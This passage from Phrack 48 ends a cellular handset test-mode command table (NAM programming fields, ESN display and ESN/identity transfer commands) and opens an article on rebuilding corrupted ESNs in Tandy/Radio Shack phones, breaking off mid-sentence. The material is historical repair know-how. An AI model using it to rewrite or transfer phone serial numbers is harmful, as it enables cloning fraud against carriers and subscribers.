  4483. |             |                     |         | alternates between AAAA BB
  4484. |             |                     |         | and CDEFGHI.  In the servicing
  4485. |             |                     |         | level of self-test, only the
  4486. |             |                     |         | information designated by
  4487. |             |                     |         | CDEFGHI is displayed.
  4488. |-------------|---------------------|---------|-----------------------------
  4489. |      03#    |  (NOT USED)         |         |
  4490. |-------------|---------------------|---------|-----------------------------
  4491. |      04#    | Initialize          |         | Carrier=OFF
  4492. |             | Transceiver         |         | Power Level=0
  4493. |             |                     |         | Receive Audio=MUTED
  4494. |             |                     |         | Transmit Audio=MUTED
  4495. |             |                     |         | Signaling Tone=OFF
  4496. |             |                     |         | SAT=OFF
  4497. |             |                     |         | DTMF & Audio Tones=OFF
  4498. |             |                     |         | Audio Path=TO SPEAKER
  4499. |-------------|---------------------|---------|-----------------------------
  4500. |      05#    | Carrier On          |         | Turn carrier on
  4501. |-------------|---------------------|---------|-----------------------------
  4502. |      06#    | Carrier Off         |         | Turn carrier off
  4503. |-------------|---------------------|---------|-----------------------------
  4504. |  NOTE: Use the PATH command (35A#) to select the audio path to test before
  4505. |  using commands 07# through 10#.
  4506. |-------------|---------------------|---------|-----------------------------
  4507. |      07#    | Rx Mute             |         | Mute the receive audio
  4508. |-------------|---------------------|---------|-----------------------------
  4509. |      08#    | Rx Un-mute          |         | Un-mute the receive audio
  4510. |-------------|---------------------|---------|-----------------------------
  4511. |      09#    | Tx Mute             |         | Mute the transmit audio
  4512. |-------------|---------------------|---------|-----------------------------
  4513. |      10#    | Tx Un-mute          |         | Un-mute the transmit audio
  4514. |-------------|---------------------|---------|-----------------------------
  4515. |    11ABCD#  | Load Synth          |         | Load synthesizer with ABCD
  4516. |             |                     |         | where ABCD =  channel number
  4517. |             |                     |         | in decimal (1329-2047, 0-600)
  4518. |-------------|---------------------|---------|-----------------------------
  4519. |      12#    | Set ATTN            |         | Set RF power attention to A
  4520. |             |                     |         | where A=attention level(0-7;
  4521. |             |                     |         | 0=maximum power)
  4522. |-------------|---------------------|---------|-----------------------------
  4523. |      13#    | RESET OFF           |         | This command should cause the
  4524. |             |                     |         | Logic Unit to set WATCH DOG
  4525. |             |                     |         | low and result in power-down
  4526. |             |                     |         | of the radiotelephone.
  4527. |-------------|---------------------|---------|-----------------------------
  4528. |      14#    | STON                |         | Transmit signaling tone 10khz
  4529. |-------------|---------------------|---------|-----------------------------
  4530. |      15#    | STOFF               |         | Stop transmitting signaling 
  4531. |             |                     |         | tone 10khz
  4532. |-------------|---------------------|---------|-----------------------------
  4533. |      16#    | SETUP               |         | Transmit a five word reverse
  4534. |             |                     |         | control channel message; each
  4535. |             |                     |         | of the five words will be
  4536. |             |                     |         | "FF00AA55CC33".  The trans-
  4537. |             |                     |         | mitter de-keys at end of 
  4538. |             |                     |         | message
  4539. |-------------|---------------------|---------|-----------------------------
  4540. |      17#    | VOICE               |         | Transmit a two word reverse
  4541. |             |                     |         | voice channel message; both
  4542. |             |                     |         | words will be "FF00AA55CC33".
  4543. |             |                     |         | The transmitter de-keys at end
  4544. |             |                     |         | of message.
  4545. |-------------|---------------------|---------|-----------------------------
  4546. |      18#    | SEND NAM            |         | AA = Address    BB = Data
  4547. |             |                     |         | Displays contents of NAM, one
  4548. |             |                     |         | address at a time, advanced
  4549. |             |                     |         | by pressing the (*) key.
  4550. |             |                     |         | Note the address goes up to 1f
  4551. |-------------|---------------------|---------|-----------------------------
  4552. |      19#    | VERSION             |         | Displays software version
  4553. |             |                     |         | number as "year, week"
  4554. |-------------|---------------------|---------|-----------------------------
  4555. |  NOTE: Entering commands 20# through 23# or 27# causes the transceiver to
  4556. | begin a counting sequence or continuous transmission as described below.
  4557. | In order to exit from the commands to enter another test command, the (#)
  4558. | key must be depressed; all other key depressions are ineffectual.
  4559. |---------------------------------------------------------------------------
  4560. |      20#    | RCVS 1              |         | Receive control channel
  4561. |             |                     |         | messages counting correctable
  4562. |             |                     |         | and uncorrectable errors.
  4563. |             |                     |         | When the command starts, the
  4564. |             |                     |         | number of the command will be
  4565. |             |                     |         | displayed in the right hand
  4566. |             |                     |         | side of the display. Entering
  4567. |             |                     |         | a # key will terminate the
  4568. |             |                     |         | command and display a two
  4569. |             |                     |         | three digit number in the
  4570. |             |                     |         | display. The first number
  4571. |             |                     |         | is the number of correctable
  4572. |             |                     |         | errors and the second is the
  4573. |             |                     |         | uncorrectable errors.
  4574. |-------------|---------------------|---------|-----------------------------
  4575. |      21#    | RCVV 1              |         | Receive voice channel
  4576. |             |                     |         | messages counting correctable
  4577. |             |                     |         | and uncorrectable errors.
  4578. |             |                     |         | When the command starts, the
  4579. |             |                     |         | number of the command will be
  4580. |             |                     |         | displayed in the right hand
  4581. |             |                     |         | side of the display. Entering
  4582. |             |                     |         | a # key will terminate the
  4583. |             |                     |         | command and display a two
  4584. |             |                     |         | three digit number in the
  4585. |             |                     |         | display. The first number
  4586. |             |                     |         | is the number of correctable
  4587. |             |                     |         | errors and the second is the
  4588. |             |                     |         | uncorrectable errors.
  4589. |-------------|---------------------|---------|-----------------------------
  4590. |      22#    | WSTS                |         | Receive control channel
  4591. |             |                     |         | messages counting word sync
  4592. |             |                     |         | sequence. When the command
  4593. |             |                     |         | starts, the number of the
  4594. |             |                     |         | command will be displayed in
  4595. |             |                     |         | the right side of the display.
  4596. |             |                     |         | Entering a # key will 
  4597. |             |                     |         | terminate the command and 
  4598. |             |                     |         | display the number of word
  4599. |             |                     |         | sync sequences in the display.
  4600. |-------------|---------------------|---------|-----------------------------
  4601. |      23#    | WSTV                |         | Receive voice channel
  4602. |             |                     |         | messages counting word sync
  4603. |             |                     |         | sequence. When the command
  4604. |             |                     |         | starts, the number of the
  4605. |             |                     |         | command will be displayed in
  4606. |             |                     |         | the right side of the display.
  4607. |             |                     |         | Entering a # key will 
  4608. |             |                     |         | terminate the command and 
  4609. |             |                     |         | display the number of word
  4610. |             |                     |         | sync sequences in the display.
  4611. |-------------|---------------------|---------|-----------------------------
  4612. |      24#    |  (NOT USED)         |         |
  4613. |-------------|---------------------|---------|-----------------------------
  4614. |     25A#    | SATON               |         | Enable the transmission of
  4615. |             |                     |         | SAT where A = SAT frequency.
  4616. |             |                     |         | See chart below.
  4617. |             |                     |         |        A     SAT Freq.
  4618. |             |                     |         |        0      5970 Hz
  4619. |             |                     |         |        1      6000 Hz
  4620. |             |                     |         |        2      6030 Hz
  4621. |-------------|---------------------|---------|-----------------------------
  4622. |      26#    | SATOFF              |         | Disable the transmission of 
  4623. |             |                     |         | SAT.
  4624. |-------------|---------------------|---------|-----------------------------
  4625. |      27#    | TRANSMIT DATA       |         | TX continuous control channel
  4626. |             |                     |         | data.
  4627. |-------------|---------------------|---------|-----------------------------
  4628. |      32#    | CLEAR               |         | Clears non-volatile memory.
  4629. |             |                     |         | Clears all stored numbers.
  4630. |-------------|---------------------|---------|-----------------------------
  4631. |      33#    | DTMF                |         | Turn DTMF on.
  4632. |-------------|---------------------|---------|-----------------------------
  4633. |      34#    | DTMF                |         | Turn DTMF off.
  4634. |-------------|---------------------|---------|-----------------------------
  4635. |      35#    | DISPLAY RSSI        |         | 'D' series portable only.
  4636. |-------------|---------------------|---------|-----------------------------
  4637. |     35A#    | SET AUDIO PATH      |         | Where A = the following...
  4638. |             |                     |         | 1 = Speaker
  4639. |             |                     |         | 2 = Microphone
  4640. |             |                     |         | 3 = Earpiece
  4641. |-------------|---------------------|---------|-----------------------------
  4642. |      38#    | DISPLAY ESN         |         | Displays ESN in four steps,
  4643. |             |                     |         | hit * till back at start.
  4644. |-------------|---------------------|---------|-----------------------------
  4645. |      41#    |  (NOT USED)         |         | Enables diversity.
  4646. |-------------|---------------------|---------|-----------------------------
  4647. |      42#    |  (NOT USED)         |         | Disables diversity.
  4648. |-------------|---------------------|---------|-----------------------------
  4649. |      43#    |  (NOT USED)         |         | Disables diversity.
  4650. |-------------|---------------------|---------|-----------------------------
  4651. |      44#    |  (NOT USED)         |         | Disables diversity.
  4652. |-------------|---------------------|---------|-----------------------------
  4653. |      45#    | READ RSSI           |         | Returns the RSSI reading
  4654. |             |                     |         | taken on the current channel.
  4655. |             |                     |         | The number is displayed as a
  4656. |             |                     |         | three digit decimal number.
  4657. |-------------|---------------------|---------|-----------------------------
  4658. |      46#    |  (NOT USED)         |         |
  4659. |-------------|---------------------|---------|-----------------------------
  4660. |     47A#    | AUDLEV              |         | Set audio level where A=level
  4661. |             |                     |         | (0=lowest, 15=highest). The
  4662. |             |                     |         | normal level is 2.
  4663. |             |                     |         | NOTE: Use 8 to 12 only for
  4664. |             |                     |         | DTMF applications.
  4665. |-------------|---------------------|---------|-----------------------------
  4666. |      48#    | SIDETONE ON         |         | Enable sidetone(Command 05#
  4667. |             |                     |         | must also be executed.
  4668. |-------------|---------------------|---------|-----------------------------
  4669. |      49#    | SIDETONE OFF        |         | Disable sidetone(Command 06#
  4670. |             |                     |         | must also be executed.
  4671. |-------------|---------------------|---------|-----------------------------
  4672. |      50#    | MAINN               |         | Not normally used. Tests data
  4673. |             |                     |         | transmission/reception with
  4674. |             |                     |         | transmit path connected
  4675. |             |                     |         | externally to receive path.
  4676. |             |                     |         | Maintenance data is trans-
  4677. |             |                     |         | mitted and test results 
  4678. |             |                     |         | displayed:
  4679. |             |                     |         | PASS= received data is correct
  4680. |             |                     |         | FAIL=2-second timeout, no data
  4681. |             |                     |         | received, or received data is
  4682. |             |                     |         | incorrect.
  4683. |-------------|---------------------|---------|-----------------------------
  4684. |      51#    | MAINL               |         | Tests data paths internal to
  4685. |             |                     |         | the logic unit, where
  4686. |             |                     |         | maintenance data is trans-
  4687. |             |                     |         | mitted and looped back. 
  4688. |             |                     |         | Display is as follows:
  4689. |             |                     |         | PASS= received data is correct
  4690. |             |                     |         | FAIL=2-second timeout, no 
  4691. |             |                     |         | looped-back data, or 
  4692. |             |                     |         | looped-back data is incorrect.
  4693. |-------------|---------------------|---------|-----------------------------
  4694. |     52A#    |  (NOT USED)         |         |
  4695. |-------------|---------------------|---------|-----------------------------
  4696. |      53#    |  (NOT USED)         |         |
  4697. |-------------|---------------------|---------|-----------------------------
  4698. |      54#    |  (NOT USED)         |         |
  4699. |-------------|---------------------|---------|-----------------------------
  4700. |      55#    | DISPLAY/PROGRAM     | NAM     | Displays the contents of the
  4701. |             |                     |         | NAM, one step at a time, ad-
  4702. |             |                     |         | vanced by depressing the (*)
  4703. |             |                     |         | key. Only the last 7 digits
  4704. |             |                     |         | of data are displayed. Refer
  4705. |             |                     |         | to NAM programming instruct-
  4706. |             |                     |         | ions in this manual for progr-
  4707. |             |                     |         | amming details.
  4708. |
  4709. | 01.  02051        - System ID umber. Vodaphone=02051 Cellnet=03600
  4710. | 02.  xxxxxxxx     - A option byte (in binary)
  4711. |      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
  4712. |      |            | Local use (bit A7) if set to 1 mobile will |
  4713. |      |     0      | respond to local control orders in the home|
  4714. |      |            | area. Assigned by system operator.         |
  4715. |      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
  4716. |      |            | Preferred system (bit A6) applies to units  |
  4717. |      |     0      | capable of operating on two service systems|
  4718. |      |            | 0 = system B   1 = system A                |
  4719. |      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
  4720. |      |            | End-to-end signaling (bit A5) when enabled|
  4721. |      |     1      | indicates mobile is equipped for DTMF via  |
  4722. |      |            | the keys after the landline connection is  |
  4723. |      |            | made.  1 = enabled   0 = disabled          |
  4724. |      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
  4725. |      |     0      | Bit not used (bit A4)                      |
  4726. |      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
  4727. |      |            | Repertory (bit A3) indicates the mobile is |
  4728. |      |     1      | equipped with speed-dialing storage.       |
  4729. |      |            |  1 = enabled   0 = disabled                |
  4730. |      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
  4731. |      |            | Aux alert (bit A2) when enabled, user can  |
  4732. |      |     1      | place the mobile in aux alert mode and be  |
  4733. |      |            | notified of incoming call via an aux device|
  4734. |      |            |  1 = enabled   0 = disabled                |
  4735. |      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
  4736. |      |            | H/F auto mute (bit A1) when enabled, mobile|
  4737. |      |     0      | will automatically be in the mute mode when|
  4738. |      |            | a call is made using the hands-free mode   |
  4739. |      |            |  1 = enabled   0 = disabled                |
  4740. |      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
  4741. |      |            | Minmark (bit A0)supplied by system operator|
  4742. |      |     0      | when enabled the users MIN2 will be sent   |
  4743. |      |            | with each call initiated or answered.      |
  4744. |      |            |  1 = enabled   0 = disabled                |
  4745. |      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4746. | 03.  xxxxxxxxxx   - Mobile phone number
  4747. | 04.  xxxxxxxxxx   - 10 digit min
  4748. | 05.  17           - Station class mark
  4749. | 06.  09           - Access overload class (15 highest priority)
  4750. | 07.  xxxxxx       - Security code
  4751. | 08.  xxx          - Lock code
  4752. | 09.  xxxxxxxx     - B option byte (in binary)
  4753. |      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
  4754. |      |     0      | bit b7    not used                         |
  4755. |      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
  4756. |      |     0      | bit b6    not used                         |
  4757. |      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
  4758. |      |     0      | bit b5    not used                         |
  4759. |      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
  4760. |      |            | Extended field (bit b4) when enabled, the  |
  4761. |      |     0      | mobile would scan more than 32 paging ch.  |
  4762. |      |            | currently not used in UK.                  |
  4763. |      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
  4764. |      |            | Single system scan (bit b3) if set to 1    |
  4765. |      |      1     | the mobile will scan only 1 system based   |
  4766. |      |            | on the setting of option byte A bit 6      |
  4767. |      |            |  1 = enabled   0 = disabled                |
  4768. |      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
  4769. |      |            | Auto recall (bit b2) this option allows the|
  4770. |      |      1     | user to access repertory by a 1 or 2 digit |
  4771. |      |            | send sequence                              |
  4772. |      |            |  1 = enabled   0 = disabled                |
  4773. |      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
  4774. |      |            | Disable service levels (bit b1) if set to 1|
  4775. |      |      0     | service levels couldn't be changed from the|
  4776. |      |            | control unit.                              |
  4777. |      |            |  0 = enabled   1 = disabled                |
  4778. |      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
  4779. |      |            | Lock code (bit b0) when enabled, allows the|
  4780. |      |      0     | user to lock and unlock the mobile using   |
  4781. |      |            | the three digit lock code.                 |
  4782. |      |            |  0 = enabled   1 = disabled                |
  4783. |      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4784. | 10.  xxxxxxxx     - C option byte (in binary)
  4785. |      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
  4786. |      |            | User NAM programming (bit c7) when enabled |
  4787. |      |      0     | allows user to program NAM from handset    |
  4788. |      |            |  0 = enabled   1 = disabled                |
  4789. |      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
  4790. |      |      0     | Single/Dual system (bit c6) 0=single 1=dual|
  4791. |      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
  4792. |      |            | Call timer (bit c5) when enabled, the user |
  4793. |      |      0     | can access the call timer.                 |
  4794. |      |            |  0 = enabled   1 = disabled                |
  4795. |      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
  4796. |      |      1     | Auto re-dial (bit c4)                      |
  4797. |      |            |  0 = enabled   1 = disabled                |
  4798. |      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
  4799. |      |            | Speaker disable (bit c3) enable or disable |
  4800. |      |      1     | handset speaker when fitting hands free    |
  4801. |      |            |  0 = enabled   1 = disabled                |
  4802. |      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
  4803. |      |      0     | bit c2    not used                         |
  4804. |      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
  4805. |      |            | Selectable system (bit c1) allows user to  |
  4806. |      |      1     | select primary system.                     |
  4807. |      |            |  0 = enabled   1 = disabled                |
  4808. |      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
  4809. |      |      0     | bit c0    not used                         |
  4810. |      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4811. | 11.  xxxxxxxx     - D option byte (in binary)
  4812. |      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
  4813. |      |      0     | Max volume (bit d7) sets max vol to step 4 |
  4814. |      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
  4815. |      |      0     | Theft disable (bit d6) when set to 1, theft|
  4816. |      |            | alarm is not accessible.                   |
  4817. |      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
  4818. |      |      0     | Beeper disable (bit d5) 1=disable          |
  4819. |      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
  4820. |      |      1     | EXT DTMF(bit d4) when clear, DTMF is routed|
  4821. |      |            | directly through APC.                      |
  4822. |      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
  4823. |      |      0     | Flashing roam (bit d3) if enabled, roam    |
  4824. |      |            | light will flash when home area roaming.   |
  4825. |      |            |  1 = enabled   0 = disabled                |
  4826. |      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
  4827. |      |            | Audio convenience (bit d2) if disabled,    |
  4828. |      |      0     | audio levels are re-centered on power up.  |
  4829. |      |            |  0 = enabled   1 = disabled                |
  4830. |      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
  4831. |      |            | Time rx calls (bit d1) call timers will    |
  4832. |      |      0     | accumulate on incoming calls when enabled  |
  4833. |      |            |  1 = enabled   0 = disabled                |
  4834. |      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
  4835. |      |            | Charge rate (bit d0) when enabled,telephone|
  4836. |      |      1     | will respond to charge rate information    |
  4837. |      |            |  1 = enabled   0 = disabled                |
  4838. |      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4839. | 12.  0023         - Initial paging system 0023=Vodaphone 0323=Cellnet   
  4840. | 13.  0023         - Initial paging channel A 
  4841. | 14.  0323         - Initial paging channel B
  4842. | 15.  021          - Dedicated paging channels
  4843. | 16.  xxxxxxxx     - E option bytes (in binary)
  4844. |      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
  4845. |      |      0     | bit e7    not used                         |
  4846. |      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
  4847. |      |      0     | bit e6    not used                         |
  4848. |      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
  4849. |      |      0     | bit e5    not used                         |
  4850. |      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
  4851. |      |      0     | bit e4    transportable speaker present    |
  4852. |      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
  4853. |      |      0     | bit e3    not used                         |
  4854. |      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
  4855. |      |      0     | bit e2    not used                         |
  4856. |      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
  4857. |      |      0     | bit e1    not used                         |
  4858. |      |~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
  4859. |      |      1     | Word sync scan disable (bit e0) portable   |
  4860. |      |            | use only.                                  |
  4861. |      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4862. |-------------|---------------------|---------|-----------------------------
  4863. |      56#    |  (NOT USED)         |         |
  4864. |-------------|---------------------|---------|-----------------------------
  4865. |      57#    |  (NOT USED)         |         |
  4866. |-------------|---------------------|---------|-----------------------------
  4867. |      58#    | COMPANDER ON        |         | Turn compander ON
  4868. |-------------|---------------------|---------|-----------------------------
  4869. |      59#    | COMPANDER OFF       |         | Turn compander OFF
  4870. |-------------|---------------------|---------|-----------------------------
  4871. | 60# and 61# |  (NOT USED)         |         |
  4872. |-------------|---------------------|---------|-----------------------------
  4873. |      61#    | ESN TRANSFER        |         | For series I or 1? and MINI
  4874. |             |                     |         | TACS - Probably Micro TACS.
  4875. |-------------|---------------------|---------|-----------------------------
  4876. |      62#    | RNG-ON              |         | Turn the APC ringer audio
  4877. |             |                     |         | path ON.
  4878. |-------------|---------------------|---------|-----------------------------
  4879. |      63#    | RNG-OFF             |         | Turn the APC ringer audio
  4880. |             |                     |         | path OFF.
  4881. |-------------|---------------------|---------|-----------------------------
  4882. |      64#    | PLT-ON              |         | Turn the APC transmit pilot
  4883. |             |                     |         | path on.
  4884. |-------------|---------------------|---------|-----------------------------
  4885. |      65#    | PLT-OFF             |         | Turn the APC transmit pilot
  4886. |             |                     |         | path off.
  4887. |-------------|---------------------|---------|-----------------------------
  4888. | 66# thru 71#|  (NOT USED)         |         |
  4889. |-------------|---------------------|---------|-----------------------------
  4890. |      66#    | IDENTITY TRANSFER   |         | Series II and some current
  4891. |             |                     |         | portables.
  4892. |-------------|---------------------|---------|-----------------------------
  4893. |      68#    | DISPLAY FLEX AND    |         |
  4894. |             | MODEL INFO          |         |
  4895. |-------------|---------------------|---------|-----------------------------
  4896. |      69#    | USED WITH IDENTITY  |         |
  4897. |             | TRANSFER            |         |
  4898. |-------------|---------------------|---------|-----------------------------
  4899. |      72#    | MODULATION GAIN     |         | Refer to the Portable 
  4900. |             | ADJUST              |         | Telephone Phasing section for
  4901. |             |                     |         | use of this command.
  4902. |-------------|---------------------|---------|-----------------------------
  4903. |      73#    | POWER OUTPUT ADJUST |         | Refer to the Portable
  4904. |             |                     |         | Telephone Phasing section for
  4905. |             |                     |         | use of this command.
  4906. |             |                     |         | (0 to 7.)
  4907. |-------------|---------------------|---------|-----------------------------
  4908.  
  4909.  
  4910.                               ==Phrack Magazine==
  4911.  
  4912.                  Volume Seven, Issue Forty-Eight, File 7 of 18
  4913.  
  4914.  
  4915.                    TANDY / RADIO SHACK CELLULAR PHONES
  4916.  
  4917.            REBUILDING ELECTRONIC SERIAL NUMBERS AND OTHER DATA
  4918.  
  4919.  
  4920.                              By Damien Thorn
  4921.  
  4922.  
  4923.  
  4924.  
  4925.                                 LEGAL CRAP
  4926.  
  4927. (mandated by our cheap-suit, can't afford cigars, polyester-pants-wearing,
  4928. no-practice-having, almost dis-barred, old-fart legal counsel who only charges
  4929. us $20 / hour because he meant to retire when he was 70 but lived a few years
  4930. longer than he expected...hell, we love him!)
  4931.  
  4932. Contents copyright 1994, 1995  Phoenix Rising Communications.
  4933. Software copyright 1993, 1994, 1995 as indicated.
  4934.  
  4935. All Rights Reserved.  Distribution of contents in hard-copy form is forbidden.
  4936. Redistribution in electronic form is permitted only as outlined in the Phrack
  4937. licensing agreement, provided this article is not segregated from the other
  4938. editorial contents of Phrack #48.
  4939.  
  4940. Use caution when rebuilding corrupt serial numbers, and avoid lending your
  4941. talents to further the goals of unscrupulous people.
  4942.  
  4943. Altering the serial number of a cellular transceiver is a violation of the
  4944. FCC rules, and the U.S. Secret Service is charged with the responsibility
  4945. of investigating fraudulent activity.
  4946.  
  4947. All of this material was developed in-house and not provided or
  4948. endorsed by the manufacturer.  Brand names and trademarks are used for
  4949. identification purposes only and are the property of their respective
  4950. owners.  Use of same within this article definitely does not imply agreement
  4951. with or endorsement of the material presented, and probably aggravates them
  4952. to no end.   There are no guarantees or warranties with regard to the accuracy
  4953. of this article.  Although we've done the best job that we can, we may be
  4954. wrong.  Happens all the time.  If you damage a phone or inadvertently start
  4955. a global thermonuclear war, that's your problem.  Don't come crying to us, or
  4956. make us fork over another twenty bucks to the old shyster. What you do with
  4957. this information is your responsibility.
  4958.  
  4959.  
  4960.                                INTRODUCTION
  4961.  
  4962.                                      
  4963. While manufacturers publish service manuals for their cellular
  4964. transceivers, they have an annoying habit of omitting certain
  4965. data pertaining to memory devices and the arrangement of the data
  4966. stored inside them.  Since this stored information includes the
  4967. electronic serial number (ESN), the lack of documentation can
  4968. easily be excused as a way to avoid unwittingly facilitating
  4969. fraud.
  4970.  
  4971. The drawback to the 'security through obscurity' approach is that
  4972. service technicians who have a legitimate need to reprogram these
  4973. memory devices are unable to do so.  The Nokia-designed
  4974. transceivers discussed in this article are an excellent example. 
  4975. Since the ESN is stored in the same electrically-erasable
  4976. programmable read-only memory (EEPROM) device as the numeric
  4977. assignment module (NAM) information, corruption of the data can
  4978. be catastrophic to the operation of the phone.
  4979.  
  4980. Since the handset programming mode of these Nokia units actually
  4981. write-enables the memory device to store the alterable parameters,
  4982. an errant pulse from the microprocessor, dropped bits or supply
  4983. voltages falling out of tolerance can cause the ESN or checksum
  4984. to become overwritten or otherwise rendered useless.  Should this
  4985. occur, dealers have had little recourse but to ship the
  4986. transceiver back to the factory for repair.  Until now, that is.
  4987.  
  4988. The goal of Phoenix Rising Communications in producing this
  4989. documentation is to empower technicians to do the job they have
  4990. been educated and hired to perform.  This guide to Tandy and
  4991. Radio Shack cellular phones will enable the technician to rebuild the
  4992. corrupt data within this series of transceivers with confidence.
  4993.  
  4994. The information in this article was developed from the installed
  4995. and transportable versions of the most commonly purchased phones
  4996. from Radio Shack stores.  These units were sold for many years,
  4997. and finally replaced last year with a new, redesigned model.  The
  4998. data presented here can probably be applied to certain compatible
  4999. Nokia transceivers as indicated later in the text. 
  5000.  
  5001.  
  5002.                                  CHAPTER 1
  5003.  
  5004. This publication is designed to provide supplemental information
  5005. to assist in the servicing of cellular mobile telephones
  5006. manufactured by Tandy Corporation under license from the Nokia Corporation. 
  5007. It is not meant to be a replacement for the factory service manual. 
  5008. Any shop needing to perform component level repairs should
  5009. definitely obtain the factory documentation from Tandy National
  5010. Parts.
  5011.  
  5012. Our primary goal is to explain the contents of the numeric
  5013. assignment module, or NAM.  In these particular phones, both the
  5014. NAM parameters and the electronic serial number (ESN) are stored
  5015. within the same electrically erasable programmable read-only
  5016. memory (EEPROM) device.
  5017.  
  5018. The problem inherent with this engineering decision is that the
  5019. ESN stored within this chip is not necessarily permanent.  Since the
  5020. chip can be erased or reprogrammed, certain circumstances could
  5021. possibly cause the ESN to become corrupt.  These include improper
  5022. signals from the microprocessor, induced currents or a power
  5023. interruption during NAM programming as the write cycle is taking
  5024. place.
  5025.  
  5026. Since the available service literature does not describe the
  5027. functions of this serial EEPROM or the data contained within,
  5028. service personnel would have to return the transceiver to the
  5029. manufacturer for service.  This is not cost effective in terms of
  5030. time or money for either the shop or cellular customer.
  5031.  
  5032. Technicians who invest a little time to become familiar with the
  5033. data stored within the NAM circuitry, including the placement of
  5034. the ESN and checksum byte can service these types of problems
  5035. in-house and with little difficulty.
  5036.  
  5037. Basic instructions for peaking the transceiver's RF sections have
  5038. also been included herein as a convenience.  While the phone is
  5039. open and on the test bench, the customer's transceiver should
  5040. also be given a quick check for proper alignment.
  5041.  
  5042.                             EQUIPMENT REQUIRED
  5043.  
  5044. Other than basic hand tools, disassembly of the phone requires a
  5045. soldering iron with a medium sized tip and a vacuum de-soldering
  5046. tool.  Good size solder removal braid may be used in conjunction
  5047. with, or in lieu of the de-soldering tool.
  5048.  
  5049. To correct data that has become corrupted within the EEPROM, a
  5050. programming device is required capable of reading and burning an
